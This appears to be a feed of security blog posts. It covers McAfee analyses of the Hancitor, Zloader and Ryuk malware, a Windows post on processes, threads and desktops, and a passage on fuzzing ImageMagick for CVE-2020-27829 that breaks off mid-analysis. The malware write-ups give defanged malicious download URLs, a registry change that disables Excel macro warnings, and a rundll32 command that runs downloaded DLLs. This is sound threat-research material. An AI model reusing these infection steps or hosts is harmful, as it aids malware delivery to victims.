Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Hancitor Making Use of Cookies to Prevent URL Scraping

8 July 2021 at 22:15
Consejos para protegerte de quienes intentan hackear tus correos electrónicos

This blog was written by Vallabh Chole & Oliver Devane

Over the years, the cybersecurity industry has seen many threats get taken down, such as the Emotet takedown in January 2021. It doesn’t usually take long for another threat to attempt to fill the gap left by the takedown. Hancitor is one such threat.

Like Emotet, Hancitor can send Malspams to spread itself and infect as many users as possible. Hancitor’s main purpose is to distribute other malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware and Zeppelin Ransomware. The dropped Cobalt Strike beacons can then be used to move laterally around the infected environment and also execute other malware such as ransomware.

This blog will focus on a new technique used by Hancitor created to prevent crawlers from accessing malicious documents used to download and execute the Hancitor payload.

The infection flow of Hancitor is shown below:

A victim will receive an email with a fake DocuSign template to entice them to click a link. This link leads him to feedproxy.google.com, a service that works similar to an RSS Feed and enables site owners to publish site updates to its users.

When accessing the link, the victim is redirected to the malicious site. The site will check the User-Agent of the browser and if it is a non-Windows User-Agent the victim will be redirected to google.com.

If the victim is on a windows machine, the malicious site will create a cookie using JavaScript and then reload the site.

The code to create the cookie is shown below:

The above code will write the Timezone to value ‘n’ and the time offset to UTC in value ‘d’ and set it into cookie header for an HTTP GET Request.

For example, if this code is executed on a machine with timezone set as BST the values would be:

d = 60

n = “Europe/London”

These values may be used to prevent further malicious activity or deploy a different payload depending on geo location.

Upon reloading, the site will check if the cookie is present and if it is, it will present them with the malicious document.

A WireShark capture of the malicious document which includes the cookie values is shown below:

The document will prompt them to enable macros and, when enabled, it will download the Hancitor DLL and then load it with Rundll32.

Hancitor will then communicate with its C&C and deploy further payloads. If running on a Windows domain, it will download and deploy a Cobalt Strike beacon.

Hancitor will also deploy SendSafe which is a spam module, and this will be used to send out malicious spam emails to infect more victims.

Conclusion

With its ability to send malicious spam emails and deploy Cobalt Strike beacons, we believe that Hancitor will be a threat closely linked to future ransomware attacks much like Emotet was. This threat also highlights the importance of constantly monitoring the threat landscape so that we can react quickly to evolving threats and protect our customers from them.

IOCs, Coverage, and MITRE

IOCs

IOC Type IOC Coverage Content Version
Malicious Document SHA256 e389a71dc450ab4077f5a23a8f798b89e4be65373d2958b0b0b517de43d06e3b W97M/Dropper.hx

 

4641
Hancitor DLL SHA256 c703924acdb199914cb585f5ecc6b18426b1a730f67d0f2606afbd38f8132ad6

 

Trojan-Hancitor.a 4644
Domain hosting Malicious Document URL http[:]//onyx-food[.]com/coccus.php RED N/A
Domain hosting Malicious Document

 

URL http[:]//feedproxy[.]google[.]com/~r/ugyxcjt/~3/4gu1Lcmj09U/coccus.php RED N/A

Mitre

Technique ID Tactic Technique details
T1566.002 Initial Access Spam mail with links
T1204.001 Execution User Execution by opening link.
T1204.002 Execution Executing downloaded doc
T1218 Defence Evasion Signed Binary Execution Rundll32
T1055 Defence Evasion Downloaded binaries are injected into svchost for execution
T1482 Discovery Domain Trust Discovery
T1071 C&C HTTP protocol for communication
T1132 C&C Data is base64 encoded and xored

 

 

The post Hancitor Making Use of Cookies to Prevent URL Scraping appeared first on McAfee Blog.

Zloader With a New Infection Technique

8 July 2021 at 21:44

This blog was written by Kiran Raj & Kishan N.

Introduction

In the last few years, Microsoft Office macro malware using social engineering as a means for malware infection has been a dominant part of the threat landscape. Malware authors continue to evolve their techniques to evade detection. These techniques involve utilizing macro obfuscation, DDE, living off the land tools (LOLBAS), and even utilizing legacy supported XLS formats.

McAfee Labs has discovered a new technique that downloads and executes malicious DLLs (Zloader) without any malicious code present in the initial spammed attachment macro. The objective of this blog is to cover the technical aspect of the newly observed technique.

Infection map

Threat Summary

  • The initial attack vector is a phishing email with a Microsoft Word document attachment.
  • Upon opening the document, a password-protected Microsoft Excel file is downloaded from a remote server.
  • The Word document Visual Basic for Applications (VBA) reads the cell contents of the downloaded XLS file and writes into the XLS VBA as macros.
  • Once the macros are written to the downloaded XLS file, the Word document sets the policy in the registry to Disable Excel Macro Warning and calls the malicious macro function dynamically from the Excel file,
  • This results in the downloading of the Zloader payload. The Zloader payload is then executed by rundll32.exe.

The section below contains the detailed technical analysis of this technique.

Detailed Technical Analysis

Infection Chain

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, the Word document, in turn, downloads and opens another password-protected Microsoft Excel document.

After downloading the XLS file, the Word VBA reads the cell contents from XLS and creates a new macro for the same XLS file and writes the cell contents to XLS VBA macros as functions.

Once the macros are written and ready, the Word document sets the policy in the registry to Disable Excel Macro Warning and invokes the malicious macro function from the Excel file. The Excel file now downloads the Zloader payload. The Zloader payload is then executed using rundll32.exe.

Figure-1: flowchart of the Infection chain

Word Analysis

Here is how the face of the document looks when we open the document (figure 2). Normally, the macros are disabled to run by default by Microsoft Office. The malware authors are aware of this and hence present a lure image to trick the victims guiding them into enabling the macros.

Figure-2: Image of Word Document Face

The userform combo-box components present in the Word document stores all the content required to connect to the remote Excel document including the Excel object, URL, and the password required to open the Excel document. The URL is stored in the Combobox in the form of broken strings which will be later concatenated to form a complete clear string.

Figure-3: URL components (right side) and the password to open downloaded Excel document (“i5x0wbqe81s”) present in user-form components.

VBA Macro Analysis of Word Document

Figure-4: Image of the VBA editor

In the above image of macros (figure 4), the code is attempting to download and open the Excel file stored in the malicious domain. Firstly, it creates an Excel application object by using CreateObject() function and reading the string from Combobox-1 (ref figure-2) of Userform-1 which has the string “excel. Application” stored in it. After creating the object, it uses the same object to open the Excel file directly from the malicious URL along with the password without saving the file on the disk by using Workbooks.Open() function.

Figure-5: Word Macro code that reads strings present in random cells in Excel sheet.

 

The above snippet (figure 5) shows part of the macro code that is reading the strings from the Excel cells.

For Example:

Ixbq = ifk.sheets(3).Cells(44,42).Value

The code is storing the string present in sheet number 3 and the cell location (44,42) into the variable “ixbq”. The Excel.Application object that is assigned to variable “ifk” is used to access sheets and cells from the Excel file that is opened from the malicious domain.

In the below snippet (figure 6), we can observe the strings stored in the variables after being read from the cells. We can observe that it has string related to the registry entry “HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\AccessVBOM” that is used to disable trust access for VBA into Excel and the string “Auto_Open3” that is going to be the entry point of the Excel macro execution.

We can also see the strings “ThisWorkbook”, “REG_DWORD”, “Version”, “ActiveVBProject” and few random functions as well like “Function c4r40() c4r40=1 End Function”. These macro codes cannot be detected using static detection since the content is formed dynamically on run time.

Figure-6: Value of variables after reading Excel cells.

After extracting the contents from the Excel cells, the parent Word file creates a new VBA module in the downloaded Excel file by writing the retrieved contents. Basically, the parent Word document is retrieving the cell contents and writing them to XLS macros.

Once the macro is formed and ready, it modifies the below RegKey to disable trust access for VBA on the victim machine to execute the function seamlessly without any Microsoft Office Warnings.

HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\AccessVBOM

After writing macro contents to Excel file and disabling the trust access, function ’Auto_Open3()’ from newly written excel VBA will be called which downloads zloader dll from the ‘hxxp://heavenlygem.com/22.php?5PH8Z’ with extension .cpl

Figure-7: Image of ’Auto_Open3()’ function

The downloaded dll is saved in %temp% folder and executed by invoking rundll32.exe.

Figure-8: Image of zloader dll invoked by rundll32.exe

Command-line parameter:

Rundll32.exe shell32.dll,Control_RunDLL “<path downloaded dll>”

Windows Rundll32 commands loads and runs 32-bit DLLs that can be used for directly invoking specified functions or used to create shortcuts. In the above command line, the malware uses “Rundll32.exe shell32.dll,Control_RunDLL” function to invoke control.exe (control panel) and passes the DLL path as a parameter, therefore the downloaded DLL is executed by control.exe.

Excel Document Analysis:

The below image (figure 9) is the face of the password-protected Excel file that is hosted on the server. We can observe random cells storing chunks of strings like “RegDelete”, “ThisWorkbook”, “DeleteLines”, etc.

These strings present in worksheet cells are formed as VBA macro in the later stage.

Figure-9: Image of Remote Excel file.

Coverage and prevention guidance:

McAfee’s Endpoint products detect this variant of malware and files dropped during the infection process.

The main malicious document with SHA256 (210f12d1282e90aadb532e7e891cbe4f089ef4f3ec0568dc459fb5d546c95eaf) is detected with V3 package version – 4328.0 as “W97M/Downloader.djx”.  The final Zloader payload with SHA-256 (c55a25514c0d860980e5f13b138ae846b36a783a0fdb52041e3a8c6a22c6f5e2)which is a DLL is detected by signature Zloader-FCVPwith V3 package version – 4327.0

Additionally, with the help of McAfee’s Expert rule feature, customers can strengthen the security by adding custom Expert rules based on the behavior patterns of the malware. The below EP rule is specific to this infection pattern.

McAfee advises all users to avoid opening any email attachments or clicking any links present in the mail without verifying the identity of the sender. Always disable the macro execution for Office files. We advise everyone to read our blog on this new variant of Zloader and its infection cycle to understand more about the threat.

Different techniques & tactics are used by the malware to propagate and we mapped these with the MITRE ATT&CK platform.

  • E-mail Spear Phishing (T1566.001): Phishing acts as the main entry point into the victim’s system where the document comes as an attachment and the user enables the document to execute the malicious macro and cause infection. This mechanism is seen in most of the malware like Emotet, Drixed, Trickbot, Agenttesla, etc.
  • Execution (T1059.005): This is a very common behavior observed when a malicious document is opened. The document contains embedded malicious VBA macros which execute code when the document is opened/closed.
  • Defense Evasion (T1218.011): Execution of signed binary to abuse Rundll32.exe and to proxy execute the malicious code is observed in this Zloader variant. This tactic is now also part of many others like Emotet, Hancitor, Icedid, etc.
  • Defense Evasion (T1562.001): In this tactic, it Disables or Modifies security features in Microsoft Office document by changing the registry keys.

IOC

Type Value Scanner Detection Name Detection Package Version (V3)
Main Word Document 210f12d1282e90aadb532e7e891cbe4f089ef4f3ec0568dc459fb5d546c95eaf ENS W97M/Downloader.djx 4328
Downloaded dll c55a25514c0d860980e5f13b138ae846b36a783a0fdb52041e3a8c6a22c6f5e2 ENS Zloader-FCVP 4327
URL to download XLS hxxp://heavenlygem.com/11.php WebAdvisor

 

Blocked N/A
URL to download dll hxxp://heavenlygem.com/22.php?5PH8Z WebAdvisor

 

Blocked N/A

Conclusion

Malicious documents have been an entry point for most malware families and these attacks have been evolving their infection techniques and obfuscation, not just limiting to direct downloads of payload from VBA, but creating agents dynamically to download payload as we discussed in this blog. Usage of such agents in the infection chain is not only limited to Word or Excel, but further threats may use other living off the land tools to download its payloads.

Due to security concerns, macros are disabled by default in Microsoft Office applications. We suggest it is safe to enable them only when the document received is from a trusted source.

The post Zloader With a New Infection Technique appeared first on McAfee Blog.

New Ryuk Ransomware Sample Targets Webservers

7 July 2021 at 04:01

Executive Summary

Ryuk is a ransomware that encrypts a victim’s files and requests payment in Bitcoin cryptocurrency to release the keys used for encryption. Ryuk is used exclusively in targeted ransomware attacks.

Ryuk was first observed in August 2018 during a campaign that targeted several enterprises. Analysis of the initial versions of the ransomware revealed similarities and shared source code with the Hermes ransomware. Hermes ransomware is a commodity malware for sale on underground forums and has been used by multiple threat actors.

To encrypt files Ryuk utilizes a combination of symmetric AES (256-bit) encryption and asymmetric RSA (2048-bit or 4096-bit) encryption. The symmetric key is used to encrypt the file contents, while the asymmetric public key is used to encrypt the symmetric key. Upon payment of the ransom the corresponding asymmetric private key is released, allowing the encrypted files to be decrypted.

Because of the targeted nature of Ryuk infections, the initial infection vectors are tailored to the victim. Often seen initial vectors are spear-phishing emails, exploitation of compromised credentials to remote access systems and the use of previous commodity malware infections. As an example of the latter, the combination of Emotet and TrickBot, have frequently been observed in Ryuk attacks.

Coverage and Protection Advice

Ryuk is detected as Ransom-Ryuk![partial-hash].

Defenders should be on the lookout for traces and behaviours that correlate to open source pen test tools such as winPEAS, Lazagne, Bloodhound and Sharp Hound, or hacking frameworks like Cobalt Strike, Metasploit, Empire or Covenant, as well as abnormal behavior of non-malicious tools that have a dual use. These seemingly legitimate tools (e.g., ADfind, PSExec, PowerShell, etc.) can be used for things like enumeration and execution. Subsequently, be on the lookout for abnormal usage of Windows Management Instrumentation WMIC (T1047). We advise everyone to check out the following blogs on evidence indicators for a targeted ransomware attack (Part1, Part2).

  • Looking at other similar Ransomware-as-a-Service families we have seen that certain entry vectors are quite common among ransomware criminals:
  • E-mail Spear phishing (T1566.001) often used to directly engage and/or gain an initial foothold. The initial phishing email can also be linked to a different malware strain, which acts as a loader and entry point for the attackers to continue completely compromising a victim’s network. We have observed this in the past with the likes of Trickbot & Ryuk or Qakbot & Prolock, etc.
  • Exploit Public-Facing Application (T1190) is another common entry vector, given cyber criminals are often avid consumers of security news and are always on the lookout for a good exploit. We therefore encourage organizations to be fast and diligent when it comes to applying patches. There are numerous examples in the past where vulnerabilities concerning remote access software, webservers, network edge equipment and firewalls have been used as an entry point.
  • Using valid accounts (T1078) is and has been a proven method for cybercriminals to gain a foothold. After all, why break the door down if you already have the keys? Weakly protected RDP access is a prime example of this entry method. For the best tips on RDP security, please see our blog explaining RDP security.
  • Valid accounts can also be obtained via commodity malware such as infostealers that are designed to steal credentials from a victim’s computer. Infostealer logs containing thousands of credentials can be purchased by ransomware criminals to search for VPN and corporate logins. For organizations, having a robust credential management and MFA on user accounts is an absolute must have.

When it comes to the actual ransomware binary, we strongly advise updating and upgrading endpoint protection, as well as enabling options like tamper protection and Rollback. Please read our blog on how to best configure ENS 10.7 to protect against ransomware for more details.

Summary of the Threat

Ryuk ransomware is used exclusively in targeted attacks

Latest sample now targets webservers

New ransom note prompts victims to install Tor browser to facilitate contact with the actors

After file encryption, the ransomware will print 50 copies of the ransom note on the default printer

Learn more about Ryuk ransomware, including Indicators of Compromise, Mitre ATT&CK techniques and Yara Rule, by reading our detailed technical analysis.

The post New Ryuk Ransomware Sample Targets Webservers appeared first on McAfee Blog.

Processes, Threads, and Windows

3 July 2021 at 12:19

The relationship between processes and threads is fairly well known – a process contains one or more threads, running within the process, using process wide resources, like handles and address space.

Where do windows (those usually-rectangular elements, not the OS) come into the picture?

The relationship between a process, its threads, and windows, along with desktop and Window Stations, can be summarized in the following figure:

A process, threads, windows, desktops and a Window Station

A window is created by a thread, and that thread is designated as the owner of the window. The creating thread becomes a UI thread (if it’s the first User/GDI call it makes), getting a message queue (provided internally by Win32k.sys in the kernel). Every occurrence in the created window causes a message to be placed in the message queue of the owner thread. This means that if a thread creates 100 windows, it’s responsible for all these windows.

“Responsible” here means that the thread must perform something known as “message pumping” – pulling messages from its message queue and processing them. Failure to do that processing would lead to the infamous “Not Responding” scenario, where all the windows created by that thread become non-responsive. Normally, a thread can read its own message queue only – other threads can’t do it for that thread – this is a single threaded UI scheme used by the Windows OS by default. The simplest message pump would look something like this:

MSG msg;
while(::GetMessage(&msg, nullptr, 0, 0)) {
    ::TranslateMessage(&msg);
    ::DispatchMessage(&msg);
}

The call to GetMessage does not return until there is a message in the queue (filling up the MSG structure), or the WM_QUIT message has been retrieved, causing GetMessage to return FALSE and the loop exited. WM_QUIT is the message typically used to signal an application to close. Here is the MSG structure definition:

typedef struct tagMSG {
  HWND   hwnd;
  UINT   message;
  WPARAM wParam;
  LPARAM lParam;
  DWORD  time;
  POINT  pt;
} MSG, *PMSG;

Once a message has been retrieved, the important call is to DispatchMessage, that looks at the window handle in the message (hwnd) and looks up the window class that this window instance is a member of, and there, finally, the window procedure – the callback to invoke for messages destined to these kinds of windows – is invoked, handling the message as appropriate or passing it along to default processing by calling DefWindowProc. (I may expand on that if there is interest in a separate post).

You can enumerate the windows owned by a thread by calling EnumThreadWindows. Let’s see an example that uses the Toolhelp API to enumerate all processes and threads in the system, and lists the windows created (owned) by each thread (if any).

We’ll start by creating a snapshot of all processes and threads (error handling mostly omitted for clarity):

#include <Windows.h>
#include <TlHelp32.h>
#include <unordered_map>
#include <string>

int main() {
	auto hSnapshot = ::CreateToolhelp32Snapshot(
        TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);

We’ll build a map of process IDs to names for easy lookup later on when we show details of a process:

PROCESSENTRY32 pe;
pe.dwSize = sizeof(pe);

// we can skip the idle process
::Process32First(hSnapshot, &pe);

std::unordered_map<DWORD, std::wstring> processes;
processes.reserve(500);

while (::Process32Next(hSnapshot, &pe)) {
	processes.insert({ pe.th32ProcessID, pe.szExeFile });
}

Now we loop through all the threads, calling EnumThreadWindows and showing the results:

THREADENTRY32 te;
te.dwSize = sizeof(te);
::Thread32First(hSnapshot, &te);

static int count = 0;

struct Data {
	DWORD Tid;
	DWORD Pid;
	PCWSTR Name;
};
do {
	if (te.th32OwnerProcessID <= 4) {
		// idle and system processes have no windows
		continue;
	}
	Data d{ 
        te.th32ThreadID, te.th32OwnerProcessID, 
        processes.at(te.th32OwnerProcessID).c_str() 
    };
	::EnumThreadWindows(te.th32ThreadID, [](auto hWnd, auto param) {
		count++;
		WCHAR text[128], className[32];
		auto data = reinterpret_cast<Data*>(param);
		int textLen = ::GetWindowText(hWnd, text, _countof(text));
		int classLen = ::GetClassName(hWnd, className, _countof(className));
		printf("TID: %6u PID: %6u (%ws) HWND: 0x%p [%ws] %ws\n",
			data->Tid, data->Pid, data->Name, hWnd,
			classLen == 0 ? L"" : className,
			textLen == 0 ? L"" : text);
		return TRUE;	// bring in the next window
		}, reinterpret_cast<LPARAM>(&d));
} while (::Thread32Next(hSnapshot, &te));
printf("Total windows: %d\n", count);

EnumThreadWindows requires the thread ID to look at, and a callback that receives a window handle and whatever was passed in as the last argument. Returning TRUE causes the callback to be invoked with the next window until the window list for that thread is complete. It’s possible to return FALSE to terminate the enumeration early.

I’m using a lambda function here, but only a non-capturing lambda can be converted to a C function pointer, so the param value is used to provide context for the lambda, with a Data instance having the thread ID, its process ID, and the process name.

The call to GetClassName returns the name of the window class, or type of window, if you will. This is similar to the relationship between objects and classes in object orientation. For example, all buttons have the class name “button”. Of course, the windows enumerated are only top level windows (have no parent) – child windows are not included. It is possible to enumerate child windows by calling EnumChildWindows.

Going the other way around – from a window handle to its owner thread and *its* owner process is possible with GetWindowThreadProcessId.

Desktops

A window is placed on a desktop, and is bound to it. More precisely, a thread is bound to a desktop once it creates its first window (or has any hook installed with SetWindowsHookEx). Before that happens, a thread can attach itself to a desktop by calling SetThreadDesktop.

Normally, a thread will use the “default” desktop, which is where a logged in user sees his or her windows appearing. It is possible to create additional desktops using the CreateDesktop API. A classic example is the desktops Sysinternals tool. See my post on desktops and windows stations for more information.

It’s possible to redirect a new process to use a different desktop (and optionally a window station) as part of the CreateProcess call. The STARTUPINFO structure has a member named lpDesktop that can be set to a string with the format “WindowStationName\DesktopName” or simply “DesktopName” to keep the parent’s window station. This could look something like this:

STARTUPINFO si = { sizeof(si) };
// WinSta0 is the interactive window station
WCHAR desktop[] = L"Winsta0\\MyOtherDesktop";
si.lpDesktop = desktop;
PROCESS_INFORMATION pi;
::CreateProcess(..., &si, &pi);

“WinSta0” is always the name of the interactive Window Station (one of its desktops can be visible to the user).

The following example creates 3 desktops and launches notepad in the default desktop and the other desktops:

void LaunchInDesktops() {
	HDESK hDesktop[4] = { ::GetThreadDesktop(::GetCurrentThreadId()) };
	for (int i = 1; i <= 3; i++) {
		hDesktop[i] = ::CreateDesktop(
			(L"Desktop" + std::to_wstring(i)).c_str(),
			nullptr, nullptr, 0, GENERIC_ALL, nullptr);
	}
	STARTUPINFO si = { sizeof(si) };
	WCHAR name[32];
	si.lpDesktop = name;
	DWORD len;
	PROCESS_INFORMATION pi;
	for (auto h : hDesktop) {
		::GetUserObjectInformation(h, UOI_NAME, name, sizeof(name), &len);
		WCHAR pname[] = L"notepad";
		if (::CreateProcess(nullptr, pname, nullptr, nullptr, FALSE,
			0, nullptr, nullptr, &si, &pi)) {
			printf("Process created: %u\n", pi.dwProcessId);
			::CloseHandle(pi.hProcess);
			::CloseHandle(pi.hThread);
		}
	}
}

If yoy run the above function, you’ll see one Notepad window on your desktop. If you dig deeper, you’ll find 4 notepad.exe processes in Task Manager. The other three have created their windows in different desktops. Task Manager gives no indication of that, nor does the process list in Process Explorer. However, we see a hint in the list of handles of these “other” notepad processes. Here is one:

Handle named \Desktop1

Curiously enough, desktop objects are not stored as part of the kernel’s Object Manager namespace. If you double-click the handle, copy its address, and look it up in the kernel debugger, this is the result:

lkd> !object 0xFFFFAC8C12035530
Object: ffffac8c12035530  Type: (ffffac8c0f2fdbc0) Desktop
    ObjectHeader: ffffac8c12035500 (new version)
    HandleCount: 1  PointerCount: 32701
    Directory Object: 00000000  Name: Desktop1

Notice the directory object address is zero – it’s not part of any directory. It has meaning in the context of its containing Window Station.

You might think that we can use the EnumThreadWindows as demonstrated at the beginning of this post to locate the other notepad windows. Unfortunately, access is restricted and those notepad windows are not listed (more on that possibly in a future post).

We can try a different approach by using yet another enumration function – EnumDesktopWindows. Given a powerful enough desktop handle, we can enumerate all top level windows in that desktop:

void ListDesktopWindows(HDESK hDesktop) {
	::EnumDesktopWindows(hDesktop, [](auto hWnd, auto) {
		WCHAR text[128], className[32];
		int textLen = ::GetWindowText(hWnd, text, _countof(text));
		int classLen = ::GetClassName(hWnd, className, _countof(className));
		DWORD pid;
		auto tid = ::GetWindowThreadProcessId(hWnd, &pid);
		printf("TID: %6u PID: %6u HWND: 0x%p [%ws] %ws\n",
			tid, pid, hWnd, 
			classLen == 0 ? L"" : className,
			textLen == 0 ? L"" : text);
		return TRUE;
		}, 0);
}

The lambda body is very similar to the one we’ve seen earlier. The difference is that we start with a window handle with no thread ID. But it’s fairly easy to get the owner thread and process with GetWindowThreadProcessId. Here is one way to invoke this function:

auto hDesktop = ::OpenDesktop(L"Desktop1", 0, FALSE, DESKTOP_ENUMERATE);
ListDesktopWindows(hDesktop);

Here is the resulting output:

TID:   3716 PID:  23048 HWND: 0x0000000000192B26 [Touch Tooltip Window] Tooltip
TID:   3716 PID:  23048 HWND: 0x0000000001971B1A [UAC_InputIndicatorOverlayWnd]
TID:   3716 PID:  23048 HWND: 0x00000000002827F2 [UAC Input Indicator]
TID:   3716 PID:  23048 HWND: 0x0000000000142B82 [CiceroUIWndFrame] CiceroUIWndFrame
TID:   3716 PID:  23048 HWND: 0x0000000000032C7A [CiceroUIWndFrame] TF_FloatingLangBar_WndTitle
TID:  51360 PID:  23048 HWND: 0x0000000000032CD4 [Notepad] Untitled - Notepad
TID:   3716 PID:  23048 HWND: 0x0000000000032C8E [CicLoaderWndClass]
TID:  51360 PID:  23048 HWND: 0x0000000000202C62 [IME] Default IME
TID:  51360 PID:  23048 HWND: 0x0000000000032C96 [MSCTFIME UI] MSCTFIME UI

A Notepad window is clearly there. We can repeat the same exercise with the other two desktops, which I have named “Desktop2” and “Desktop3”.

Can we view and interact with these “other” notepads? The SwitchDesktop API exists for that purpose. Given a desktop handle with the DESKTOP_SWITCHDESKTOP access, SwitchDesktop changes the input desktop to the requested desktop, so that input devices redirect to that desktop. This is exactly how the Sysinternals Desktops tool works. I’ll leave the interested reader to try this out.

Window Stations

The last piece of the puzzle is a Window Station. I assume you’ve read my earlier post and understand the basics of Window Stations.

A Thread can be associated with a desktop. A process is associated with a window station, with the constraint being that any desktop used by a thread must be within the process’ window station. In other words, a process cannot use one window station and any one of its threads using a desktop that belongs to a different window station.

A process is associated with a window station upon creation – the one specified in the STARTUPINFO structure or the creator’s window station if not specified. Still, a process can associate itself with a different window station by calling SetProcessWindowStation. The constraint is that the provided window station must be part of the current session. There is one window station per session named “WinSta0”, called the interactive window station. One of its desktop can be the input desktop and have user interaction. All other window stations are non-interactive by definition, which is perfectly fine for processes that don’t require any user interface. In return, they get better isolation, because a window station contains its own set of desktops, its own clipboard and its own atom table. Windows handles, by the way, have Window Station scope.

Just like desktops, window stations can be created by calling CreateWindowStation. Window stations can be enumerated as well (in the current session) with EnumerateWindowStations.

Summary

This discussion of threads, processes, desktops, and window stations is not complete, but hopefully gives you a good idea of how things work. I may elaborate on some advanced aspects of Windows UI system in future posts.

procthreadwin-1

zodiacon

Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829

30 June 2021 at 15:00

Introduction:

ImageMagick is a hugely popular open source software that is used in lot of systems around the world. It is available for the Windows, Linux, MacOS platforms as well as Android and iOS. It is used for editing, creating or converting various digital image formats and supports various formats like PNG, JPEG, WEBP, TIFF, HEIC and PDF, among others.

Google OSS Fuzz and other threat researchers have made ImageMagick the frequent focus of fuzzing, an extremely popular technique used by security researchers to discover potential zero-day vulnerabilities in open, as well as closed source software. This research has resulted in various vulnerability discoveries that must be addressed on a regular basis by its maintainers. Despite the efforts of many to expose such vulnerabilities, recent fuzzing research from McAfee has exposed new vulnerabilities involving processing of multiple image formats, in various open source and closed source software and libraries including ImageMagick and Windows GDI+.

Fuzzing ImageMagick:

Fuzzing open source libraries has been covered in a detailed blog “Vulnerability Discovery in Open Source Libraries Part 1: Tools of the Trade” last year. Fuzzing ImageMagick is very well documented, so we will be quickly covering the process in this blog post and will focus on the root cause analysis of the issue we have found.

Compiling ImageMagick with AFL:

ImageMagick has lot of configuration options which we can see by running following command:

$./configure –help

We can customize various parameters as per our needs. To compile and install ImageMagick with AFL for our case, we can use following commands:

$CC=afl-gcc CXX=afl=g++ CFLAGS=”-ggdb -O0 -fsanitize=address,undefined -fno-omit-frame-pointer” LDFLAGS=”-ggdb -fsanitize=address,undefined -fno-omit-frame-pointer” ./configure

$ make -j$(nproc)

$sudo make install

This will compile and install ImageMagick with AFL instrumentation. The binary we will be fuzzing is “magick”, also known as “magick tool”. It has various options, but we will be using its image conversion feature to convert our image from one format to another.

A simple command would be include the following:

$ magick <input file> <output file>

This command will convert an input file to an output file format. We will be fuzzing this with AFL.

Collecting Corpus:

Before we start fuzzing, we need to have a good input corpus. One way of collecting corpus is to search on Google or GitHub. We can also use existing test corpus from various software. A good test corpus is available on the  AFL site here: https://lcamtuf.coredump.cx/afl/demo/

Minimizing Corpus:

Corpus collection is one thing, but we also need to minimize the corpus. The way AFL works is that it will instrument each basic block so that it can trace the program execution path. It maintains a shared memory as a bitmap and it uses an algorithm to check new block hits. If a new block hit has been found, it will save this information to bitmap.

Now it may be possible that more than one input file from the corpus can trigger the same path, as we have collected sample files from various sources, we don’t have any information on what paths they will trigger at the runtime. If we use this corpus without removing such files, then we end up wasting time and CPU cycles. We need to avoid that.

Interestingly AFL offers a utility called “afl-cmin” which we can use to minimize our test corpus. This is a recommended thing to do before you start any fuzzing campaign. We can run this as follows:

$afl-cmin -i <input directory> -o <output directory> — magick @@ /dev/null

This command will minimize the input corpus and will keep only those files which trigger unique paths.

Running Fuzzers:

After we have minimized corpus, we can start fuzzing. To fuzz we need to use following command:

$afl-fuzz -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

This will only run a single instance of AFL utilizing a single core. In case we have multicore processors, we can run multiple instances of AFL, with one Master and n number of Slaves. Where n is the available CPU cores.

To check available CPU cores, we can use this command:

$nproc

This will give us the number of CPU cores (depending on the system) as follows:

In this case there are eight cores. So, we can run one Master and up to seven Slaves.

To run master instances, we can use following command:

$afl-fuzz -M Master -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

We can run slave instances using following command:

$afl-fuzz -S Slave1 -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

$afl-fuzz -S Slave2 -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

The same can be done for each slave. We just need to use an argument -S and can use any name like slave1, slave2, etc.

Results:

Within a few hours of beginning this Fuzzing campaign, we found one crash related to an out of bound read inside a heap memory. We have reported this issue to ImageMagick, and they were very prompt in fixing it with a patch the very next day. ImageMagick has release a new build with version: 7.0.46 to fix this issue. This issue was assigned CVE-2020-27829.

Analyzing CVE-2020-27829:

On checking the POC file, we found that it was a TIFF file.

When we open this file with ImageMagick with following command:

$magick poc.tif /dev/null

As a result, we see a crash like below:

As is clear from the above log, the program was trying to read 1 byte past allocated heap buffer and therefore ASAN caused this crash. This can atleast lead to a  ImageMagick crash on the systems running vulnerable version of ImageMagick.

Understanding TIFF file format:

Before we start debugging this issue to find a root cause, it is necessary to understand the TIFF file format. Its specification is very well described here: http://paulbourke.net/dataformats/tiff/tiff_summary.pdf.

In short, a TIFF file has three parts:

  1. Image File Header (IFH) – Contains information such as file identifier, version, offset of IFD.
  2. Image File Directory (IFD) – Contains information on the height, width, and depth of the image, the number of colour planes, etc. It also contains various TAGs like colormap, page number, BitPerSample, FillOrder,
  3. Bitmap data – Contains various image data like strips, tiles, etc.

We can tiffinfo utility from libtiff to gather various information about the POC file. This allows us to see the following information with tiffinfo like width, height, sample per pixel, row per strip etc.:

There are a few things to note here:

TIFF Dir offset is: 0xa0

Image width is: 3 and length is: 32

Bits per sample is: 9

Sample per pixel is: 3

Rows per strip is: 1024

Planer configuration is: single image plane.

We will be using this data moving forward in this post.

Debugging the issue:

As we can see in the crash log, program was crashing at function “PushQuantumPixel” in the following location in quantum-import.c line 256:

On checking “PushQuantumPixel” function in “MagickCore/quantum-import.c” we can see the following code at line #256 where program is crashing:

We can see following:

  • “pixels” seems to be a character array
  • inside a for loop its value is being read and it is being assigned to quantum_info->state.pixel
  • its address is increased by one in each loop iteration

The program is crashing at this location while reading the value of “pixels” which means that value is out of bound from the allocated heap memory.

Now we need to figure out following:

  1. What is “pixels” and what data it contains?
  2. Why it is crashing?
  3. How this was fixed?

Finding root cause:

To start with, we can check “ReadTIFFImage” function in coders/tiff.c file and see that it allocates memory using a “AcquireQuantumMemory” function call, which appears as per the documentation mentioned here:

https://imagemagick.org/api/memory.php:

“Returns a pointer to a block of memory at least count * quantum bytes suitably aligned for any use.

The format of the “AcquireQuantumMemory” method is:

void *AcquireQuantumMemory(const size_t count,const size_t quantum)

A description of each parameter follows:

count

the number of objects to allocate contiguously.

quantum

the size (in bytes) of each object. “

In this case two parameters passed to this function are “extent” and “sizeof(*strip_pixels)”

We can see that “extent” is calculated as following in the code below:

There is a function TIFFStripSize(tiff) which returns size for a strip of data as mentioned in libtiff documentation here:

http://www.libtiff.org/man/TIFFstrip.3t.html

In our case, it returns 224 and we can also see that in the code mentioned above,  “image->columns * sizeof(uint64)” is also added to extent, which results in 24 added to extent, so extent value becomes 248.

